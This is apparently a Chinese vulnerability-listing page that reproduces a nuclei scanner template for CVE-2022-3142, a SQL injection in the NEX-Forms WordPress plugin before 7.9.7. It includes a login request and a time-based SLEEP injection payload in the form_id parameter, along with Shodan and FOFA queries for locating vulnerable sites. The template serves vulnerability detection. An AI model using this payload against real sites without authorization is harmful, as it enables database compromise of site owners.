CVE-2022-3142: NEX-Forms Plugin < 7.9.7 - SQL Injection

日期: 2025-08-01 | 影响软件: NEX-Forms Plugin | POC: 已公开

漏洞描述

The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.

PoC代码[已公开]

id: CVE-2022-3142

info:
  name: NEX-Forms Plugin < 7.9.7 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
  remediation: Fixed in version 7.9.7
  reference:
    - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
    - https://www.exploit-db.com/exploits/51042
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3142
    - http://packetstormsecurity.com/files/171477/WordPress-NEX-Forms-SQL-Injection.html
    - https://medium.com/%40elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-3142
    cwe-id: CWE-89
    epss-score: 0.22857
    epss-percentile: 0.95702
    cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: basixonline
    product: nex-forms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/
    fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/
    publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/
  tags: time-based-sqli,cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code_2 == 200'
          - 'contains(body_2, "NEX-Forms")'
          - 'contains(content_type_2, "text/html")'
        condition: and
# digest: 4a0a00473045022100956d47c4d67d7f0b8824bbfc3aa9c4228f73250ceae4987387d1ea74ce7bfdd00220618f9c8b7bf33abd3c4e8c0e1cfda76a17f632515fa75330d4114e5b373c3d08:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3142.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

CVE-2022-0342: Zyxel authentication bypass patch analysis POC

CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection POC

CVE-2022-0540: Atlassian Jira - Authentication bypass in Seraph POC

CVE-2022-0656: uDraw <3.3.3 - Local File Inclusion POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446）无POC